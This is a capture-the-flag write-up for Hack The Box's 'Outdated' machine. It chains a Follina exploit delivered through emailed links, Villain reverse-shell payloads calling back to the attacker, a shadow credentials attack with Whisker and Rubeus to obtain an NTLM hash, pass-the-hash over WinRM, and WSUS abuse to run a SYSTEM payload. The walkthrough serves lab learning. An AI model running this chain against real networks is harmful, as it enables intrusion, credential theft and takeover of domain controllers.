HTB • Outdated
Outdated is a medium Windows machine created by ctrlzero on Hack The Box that features an Active Directory domain controller that is vulnerable to CVE-2022-30190. Successful exploitation of this gets us a shell as a user called btables. This user holds a special privilege over the user sflowers that allows us to conduct a shadow credentials attack and authenticate as them. The user sflowers is part of a group that can create and approve WSUS updates which we can abuse to execute commands and get a privileged shell.
Initial Recon
Let’s first set up our environment and run a TCP port scan with this custom nmap wrapper.
1
2
3
4
# bryan@attacker
rhost="" # replace with machine address
echo rhost=$rhost >> .env && . ./.env
ctfscan $rhost
Some services mentioned in the scan results are 25/SMTP, 53/DNS, 389/LDAP, 445/SMB, and 5985/WinRM. The presence of some of these services indicate that this machine is probably an Active Directory domain controller.
Server Message Block (SMB)
The first port that we’ll enumerate is going to be SMB just because many SMB servers allow anonymous access.
Anonymous Access
1
smbclient -N -L "//$rhost/"
Using anonymous authentication, we are able to get a list of shares including one non-default share named simply Shares. Let’s try to connect to this share and possibly download the contents.
1
smbclient -N "//$rhost/Shares"
It turns out we can actually connect to this share without credentials! There is only one readable file called NOC_Reminder.pdf
.
Interesting Document
Let’s download NOC_Reminder.pdf
using the smbclient
command and see if we can obtain any interesting or valuable information from it.
1
2
smbclient -N "//$rhost/Shares" -c 'prompt;mget *;exit'
chromium ./NOC_Reminder.pdf
We find this interested document in an accessible SMB share
We can gather a couple things from this document:
- We can apparently email itsupport@outdated.htb with links to web applications which may be visited.
- The target has several unpatched vulnerabilities from the time the document was created.
After doing some research into each CVE mentioned in the document, we find out that one of the vulnerabilities is well documented and has public exploits. This exploit is labeled as CVE-2022-30190, but is more commonly referred to as Follina.
Follina
Follina is a remote code execution vulnerability that can be exploited when a user or application opens a malicious link using the MSDT protocol. Since the document we downloaded earlier suggested that this flaw was not patched, it would be worth our time to investigate.
Exploitation Conditions
In order to successfully exploit this machine, a few conditions must be met.
- The URL we submit via email must be visited
- The machine must be vulnerable to CVE-2022-30190
Checking Exploitability
We can verify that the url is opened by setting up a web server and sending the URL to itsupport@outdated.htb. To do this, we can use a CLI tool called swaks.
1
2
# bryan@attacker
php -S "$lhost:80"
1
2
3
4
5
6
7
8
# bryan@attacker
for i in {1..3}
do swaks \
--server "$rhost" \
--to "itsupport@outdated.htb" \
--from "email@mail.com" \
--body "http://$lhost/"
done
After we send a few emails and wait a couple minutes, we get a request to our web server from the target.
1 2 3 [Sat Nov 5 04:13:23 2022] 10.10.11.175:49885 Accepted [Sat Nov 5 04:13:23 2022] 10.10.11.175:49885 [404]: GET / - No such file or directory [Sat Nov 5 04:13:23 2022] 10.10.11.175:49885 Closing
If you are not receiving any requests after a few minutes, go ahead and reset the machine because this feature can be inconsistent at times.
Exploitation
At this point, we can try to exploit CVE-2022-30190 using a custom exploit script from here along with Villain.
First we start the villain server and generate our payload.
1
2
# bryan@attacker
villain -x 8844
1 2 # bryan@attacker (Villain) generate os=windows lhost=tun0
Then we run the exploit server script with the generated payload.
1
./msdt_follina_exploit.py -l "$lhost" -p 80 -c "$payload"
After waiting a minute or so, we get multiple requests from the target and a backdoor session for the user btables
is established. We add an alias to this session to make things a bit quicker.
1
2
# Villain
alias outdated-btables 59fbcd84-ed554de3-c5698c38
Active Directory Enumeration
To better understand our current context in the domain and find any paths to privilege escalation, we will be using BloodHound alongside SharpHound. These tools together will help enumerate and visualize the domain schema.
BloodHound
First we will copy SharpHound’s PowerShell wrapper from PowerSharpPack onto the machine using the smbserver.py
script from Impacket.
1
2
mkdir share
smbserver.py -smb2support x ./share
Then in a different tab, download Invoke-SharpHound4.ps1
to the SMB share directory.
1
2
cd share
wget "https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpHound4.ps1"
First we spawn an interactive shell and connect to our share.
1
2
# Villain
shell outdated-btables
1
net use x: \\10.10.14.3\x
Then we move to C:\Windows\Tasks
and download Invoke-SharpHound4.ps1
from our SMB server.
1
2
cd C:\Windows\Tasks
copy X:\Invoke-SharpHound4.ps1 .
Then we load Invoke-SharpHound4.ps1
, and execute the Invoke-SharpHound4
function
1
powershell -Ep Bypass ". .\Invoke-SharpHound4.ps1;Invoke-SharpHound4"
After the command has completed, we should have a ZIP archive in our working directory. Let’s copy it to the SMB server’s directory and load it into BloodHound.
1
copy .\*_BloodHound.zip X:\
Once we load the data into bloodhound, we can map a possible attack path with the Reachable High Value Targets
query on the btables
object.
Notice how one of the groups our current user is a member of, the ITSTAFF
group, has the AddKeyCredentialLink
privilege over the sflowers
user object. This could set us up for a shadow credentials attack on this user.
Shadow Credentials
To learn more about shadow credentials from a security perspective I would recommend reading this article.
Whisker
A tool called Whisker will help us abuse shadow credentials to compromise the sflowers object. Let’s download this PowerShell wrapper for Whisker onto the target then execute the following commands.
1
2
. .\Invoke-Whisker.ps1
Invoke-Whisker "add /target:sflowers /path:C:\Windows\Tasks\cert.bin /password:3d9563b2cc0c963e"
This should print a command meant for a tool called Rubeus.
Rubeus
Let’s copy the Rubeus powershell wrapper to the target from here then call the function with the arguments specified in the Whisker output.
1
2
. .\Invoke-Rubeus.ps1
Invoke-Rubeus "asktgt /user:sflowers /certificate:C:\Windows\Tasks\cert.bin /password:3d9563b2cc0c963e /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show"
With this command we are able to recover an NTLM hash that should allow us to authenticate as sflowers
.
WSUS Abuse
Looking back at our BloodHound window, it appears that sflowers is a member of the Remote Management Users
group and the WSUS Administrators
group.
Having membership in the Remote Management Users
group means we can easily establish a shell as sflowers
with Evil-WinRM using the hash we obtained with Rubeus. Once we do that the user flag can be found at %USERPROFILE%\Desktop\user.txt
1
2
# Back to the attacking machine
evil-winrm -i "$rhost" -u "sflowers" -H "$hash"
1
2
3
4
# Evil-WinRM
$Desktop = "$env:UserProfile\Desktop"
Get-ChildItem "$Desktop"
Get-Content "$Desktop\user.txt"
I’m assuming our membership to the WSUS Administrators group will let us install WSUS updates on the machine. The PsExec utility along with a tool called SharpWSUS can aid us in exploiting WSUS and gaining administrative privileges. We were actually able to find the suspected PsExec executable already at C:\Users\sflowers\Desktop\PsExec64.exe
. We confirm that this is the legitimate executable by comparing its checksum with the checksum of Microsoft’s PsExec64.exe
within the PsTools package.
Let’s upload this powershell wrapper for SharpWSUS, generate a Villain payload, and run the Invoke-SharpWSUS
function with the appropriate arguments to create a new update.
First let’s create a new Villain payload to execute within our malicious WSUS update.
1
2
# Villain
generate os=windows lhost=tun0 encode
Then we create a new update that will use the PsExec64.exe
utility to execute our payload.
1
2
$VillainPayload = "" # Add villain payload here
Invoke-SharpWSUS create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d $VillainPayload"
The output should display an update ID that we can use with the approve
option to approve the update for dc.outdated.htb
.
1
2
$UpdateId = "" # Add update id here
Invoke-SharpWSUS approve /updateid:"$UpdateId" /computername:"dc.outdated.htb" /groupname:"3v1LGr0Up"
Then after a few minutes we should have a new backdoor session on our Villain server. We then connect to the session using the shell
command and read the flag at C:\Users\Administrator\Desktop\root.txt
.